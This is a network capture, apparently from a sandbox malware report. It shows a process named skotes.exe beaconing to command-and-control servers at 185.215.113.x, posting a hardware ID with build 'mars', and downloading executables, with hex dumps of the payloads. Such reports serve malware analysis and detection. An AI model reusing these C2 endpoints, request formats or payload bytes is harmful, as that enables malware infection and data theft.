Nov 11, 2024 01:15:49.471795082 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:15:49.475490093 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"mars------CBGCAFIIECBFIDHIJKFB--
Nov 11, 2024 01:15:49.765146017 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50044	185.215.113.43	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:49.470191956 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 34 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005415001&unit=246122658369
Nov 11, 2024 01:15:50.395104885 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50045	185.215.113.16	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:50.902908087 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sun, 10 Nov 2024 23:53:54 GMT If-None-Match: "67314792-1c3200"
Nov 11, 2024 01:15:51.800246000 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:51 GMT Last-Modified: Sun, 10 Nov 2024 23:53:54 GMT Connection: keep-alive ETag: "67314792-1c3200"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50048	185.215.113.43	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:53.473352909 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 34 31 36 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005416031&unit=246122658369
Nov 11, 2024 01:15:54.378272057 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50051	185.215.113.16	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:54.387090921 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 11, 2024 01:15:55.295423031 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:55 GMT Content-Type: application/octet-stream Content-Length: 2767360 Last-Modified: Sun, 10 Nov 2024 23:04:52 GMT Connection: keep-alive ETag: "67313c14-2a3a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 e3 53 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ S`Ui` @ @.rsrc`2@.idata 8@qrrrzfoe)):@uhnzwkhm *@.taggant@"*@
Nov 11, 2024 01:15:55.295449972 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.295464039 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.295506001 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.295530081 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.295614958 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.295624971 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.295630932 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.295635939 CET	1236	IN	Data Raw: 27 00 a6 59 f7 e4 bc 73 67 ed ca 8a 55 88 e9 30 99 d5 b9 e7 ba 8e b3 ff af d1 0c 85 2a 53 6e 3a ea d9 11 f9 a9 4c 90 38 59 24 6e ca 6f b5 a1 fe a1 8d bd 44 b0 f7 5a 3e 34 ca f3 53 b4 bf fc 31 50 41 49 f6 30 10 90 01 f6 8f c8 8e 32 76 bd 00 d1 0f Data Ascii: 'YsgU0Sn:L8Y$noDZ>4S1PAI02vSDF)"~G9yp^\|,zs_4A`Q_rA_Y@nNVza!@`(4~ArP);}RnON\GVnx~M.i2"%lVPcIR
Nov 11, 2024 01:15:55.295655966 CET	1236	IN	Data Raw: c8 9e 93 1e c1 17 b8 f7 f1 40 af 97 d9 4f a5 f7 64 6e b8 93 e9 6b a3 a3 d6 62 22 2f bb 0f 7c fe 29 1d a9 16 28 1a eb 47 e3 c7 bf 2e b1 c2 73 6d b9 82 51 2f 63 bb 52 89 ed a1 be f5 45 92 af 7b aa 6c ad 80 7f 80 01 86 af 6f 4d d7 db de a4 52 f7 91 Data Ascii: @Odnkb"/\|)(G.smQ/cRE{loMRuj 3LDS@Ch[,mmP!k2O^/`e~TaUB.]-W2fckpeTvG\C4Dn\|eR<sP([v31)@a]jR;\| T
Nov 11, 2024 01:15:55.300323009 CET	1236	IN	Data Raw: 85 d7 aa 58 d8 da ee 52 5f 35 30 86 d4 46 b1 1d 11 25 d7 fc 25 51 a9 f7 44 2f fc 82 e0 58 5d cc 8e 74 b5 f9 13 e9 2f 79 8d f7 b9 43 e7 c9 7b f4 c8 3d 9b 2e 09 40 8a 1c 8e 37 4e 37 66 49 da 48 8a 12 1b 3a 29 57 ab 03 48 7c 9c c3 18 45 d9 58 3b 58 Data Ascii: XR_50F%%QD/X]t/yC{=.@7N7fIH:)WH\|EX;X,-s~a;@m`K]DKce.V>hR?].r^HH,RST%XXQP,6^(\3U@)V-ArCaX7_\l>ctOGTZVSs_VyNa}[pZA

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	50052	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:15:54.874887943 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 11, 2024 01:15:55.777676105 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:15:55 GMT Content-Type: application/octet-stream Content-Length: 1847808 Last-Modified: Sun, 10 Nov 2024 23:53:54 GMT Connection: keep-alive ETag: "67314792-1c3200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 7e cb [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"j@j~@M$a$ $b@.rsrc $r@.idata $r@ 0+$t@oovdzvsfOv@lmbmcfafj@.taggant0j"@
Nov 11, 2024 01:15:55.777721882 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.777748108 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.777807951 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:15:55.777829885 CET	648	IN	Data Raw: 7e 62 37 4e 1b 47 da cf 53 d3 cd da dc aa e0 d5 7e b1 c7 72 90 8c 23 31 7b ab 8c 72 b4 62 d3 c9 ab 42 ac d1 d5 a7 7e 71 15 e1 0c fd 83 ae 9a 29 33 58 c3 a1 7b af 26 e9 71 c2 c8 65 e5 b2 96 e0 f2 75 2f 12 0b 99 8b 67 16 5f c6 72 fa d8 b2 4a 73 ba Data Ascii: ~b7NGS~r#1{rbB~q)3X{&qeu/g_rJs<)]U\|zC%@j\|9sJF?vE{BBt;.n'ofc?YJF*.5k\|Cp~&sJkj{&w+`;k~b
Nov 11, 2024 01:15:55.777858973 CET	1236	IN	Data Raw: f2 23 61 57 f1 6a c7 be 24 21 d1 52 42 ea 12 06 21 ab 7d 4b 84 ac ae 1f fd eb f2 d0 83 2e b8 ea ae d0 c5 9f 7c a9 a0 bc ca 92 73 0a 63 a2 d9 4e c7 fd 5f 11 3f 24 c9 f3 02 ed 9e a6 a6 f7 88 9b 8a 72 7d 50 c1 a6 a5 c0 fa 6e 73 1e 9b 6e 8f 9e 85 87 Data Ascii: #aWj$!RB!}K.\|scN_?$r}Pnsn?USzN@>\2#@['NdPW+tQ1C[@8L`9<khLl8'CJJ{rWt.Rrf'P\|R/p$E2/s[h+=3E7b$
Nov 11, 2024 01:15:55.777884960 CET	1236	IN	Data Raw: d6 9f 30 b4 85 25 f1 59 eb bd bd b1 55 01 51 2a cd 70 cf a0 7b f2 2a d9 f1 c2 de 72 b3 02 7e 11 e3 9d d1 bb 84 d2 a6 0e a8 f5 aa 72 a0 a3 d8 de 11 e9 c8 27 cb 5c fb 1b 7b c6 7e 14 64 ba 38 0c 8a 0e 1a 04 82 b9 c4 33 9a 1b d1 49 b3 ad 7a ce c1 b1 Data Ascii: 0%YUQp{r~r'\{~d83IzwvrObogG#[*@yuNe=E#sRQ}='l^QYcS\W#ABP$@]OT+<D"e=dpg+
Nov 11, 2024 01:15:55.777914047 CET	1236	IN	Data Raw: 81 6e be 2e 7d b2 b2 bb 0e f2 7e 31 7b f3 66 fe 4a 02 d4 23 ba 89 1e cf 81 d7 7e 21 03 85 b9 59 bb 3b d3 7a 81 1c f3 54 c3 c6 d6 3f ef 6a a7 20 8b f8 ca 2a 81 42 7f 2a 16 f3 7b cf 6b f0 d9 fe 7a ea 70 d3 40 6c f1 5a c3 f0 df 00 5b 1e c3 1c 32 f3 Data Ascii: n.}~1{fJ#~!Y;zT?j B{kzp@lZ[2u2Rsb{RUTPkEN"\\|+vU"Fk+k\|D;~RsRo{6Z'HSr:??2{p,Zt_
Nov 11, 2024 01:15:55.777937889 CET	1236	IN	Data Raw: 40 1c f3 26 9e f6 72 33 f7 82 2d 53 f5 bb 41 ca 71 dd ca 32 8c ba 72 6b 13 ad 0a bc 5b aa 09 fe 8e 6b 47 c8 84 44 0b 2b d4 d2 59 5a f7 02 57 bf ae 8b df e1 d2 9b 0d b3 7b 2e 7f 01 0c ba 22 83 d2 f0 42 4b bf be 75 be cf b5 b8 72 82 fe d5 51 0b 86 Data Ascii: @&r3-SAq2rk[kGD+YZW{."BKurQ&"+&O"Qv"L~@FjM!_X&.(R'LU^rE(h~M[~;RuLRv+!$/#LkvLS
Nov 11, 2024 01:15:55.777964115 CET	1236	IN	Data Raw: 02 2d b0 2b 1a f4 01 53 ab 7e 0f c5 bb 94 5c 0a cf 15 f2 40 81 2a 7f fe ce 1f b3 f3 6b c2 0c 4f 8b 26 af 9e 81 bc 3a 22 43 ee 4e 18 55 d2 32 b2 13 be 2a 21 eb 7e 0d e1 4d f6 e0 51 67 14 f7 7e 0b be 70 07 b7 01 58 a1 8b 7e 02 1f 65 82 de 2f 95 90 Data Ascii: -+S~\@kO&:"CNU2!~MQg~pX~e/jQ!7#&k<~K"wg~{MrzbKS}qv^3rC[bP2{zn+MRV#L{!S{4cjnsm6zzagSYFj
Nov 11, 2024 01:15:55.782784939 CET	1236	IN	Data Raw: 23 c4 01 6e f9 89 45 1c 42 6c 5c 19 14 bf 8e c9 56 93 f4 e8 82 cf f1 77 24 9f 78 83 46 59 71 14 fc 84 2f b4 a5 ed 8a 56 b7 ee 79 19 2f a3 44 c8 e4 36 e5 db b0 36 d2 02 8d 62 3b 97 c9 51 e2 00 77 f4 f1 c5 06 ea 44 a8 0c 0a f0 4d 11 0d 3b bc b5 e1 Data Ascii: #nEBl\Vw$xFYq/Vy/D66b;QwDM;kvqzi26JVKr;b:edD;&{.](CMxWlJ0n,jrNYsRkFqk;;Y:r2Nbr$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50058	185.215.113.43	80	7956	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:16:01.360074043 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 34 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005417001&unit=246122658369
Nov 11, 2024 01:16:02.286452055 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:16:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	50060	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:16:05.031485081 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 01:16:05.941394091 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:16:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 01:16:05.943758011 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGDHCFCAAECAKECBAF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 2d 2d 0d 0a Data Ascii: ------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="build"mars------JKEGDHCFCAAECAKECBAF--
Nov 11, 2024 01:16:06.228173018 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:16:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	50062	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 01:16:05.961838007 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 11, 2024 01:16:06.868391991 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 00:16:06 GMT Content-Type: application/octet-stream Content-Length: 1847808 Last-Modified: Sun, 10 Nov 2024 23:53:54 GMT Connection: keep-alive ETag: "67314792-1c3200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 7e cb [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"j@j~@M$a$ $b@.rsrc $r@.idata $r@ 0+$t@oovdzvsfOv@lmbmcfafj@.taggant0j"@
Nov 11, 2024 01:16:06.868415117 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:16:06.868432999 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:16:06.868447065 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:16:06.868458986 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 01:16:06.868469954 CET	1236	IN	Data Raw: 6b 6a fb c9 7b 26 1a 13 77 1a 2b 0b f1 d2 0e 00 b3 ba 60 3b fb b9 c4 b7 6b 14 7e fd a6 62 d3 54 8b f8 b2 4d 53 02 e7 36 52 f2 84 33 83 ea 33 1f 7b 02 9c 5a f9 ea 47 3d a3 52 0f 52 8a 00 12 72 78 46 9a cc 1c 3e 3a 6d 1b 2f b3 6a b0 f6 e2 c9 b1 39 Data Ascii: kj{&w+`;k~bTMS6R33{ZG=RRrxF>:m/j9IY070xyu8I(vOj^Z8Voc4?$hFFs;t}C9z"xl?OKqTwS(7ZI&9U1OnzR
Nov 11, 2024 01:16:06.868480921 CET	1236	IN	Data Raw: 46 1f 3c 4b 06 61 da db 96 74 47 c2 7b d7 f3 ee bb 03 e8 69 04 4e 71 48 63 08 a8 48 c1 85 de 8a c2 bf fa d1 7a 77 1a 53 d7 ba f2 bd 02 01 e6 b5 b6 37 25 cf a2 f6 fc 41 4e f0 ae bc f7 28 07 3c cf bf df 2c f7 2f 8f 27 b7 96 d9 06 c3 c4 5e da a0 24 Data Ascii: F<KatG{iNqHcHzwS7%AN(<,/'^$&*+gIAFcUP)Wpm\n;@S!hg]A34>\|6DzM=-6+!z}C]{~jAjkr%R
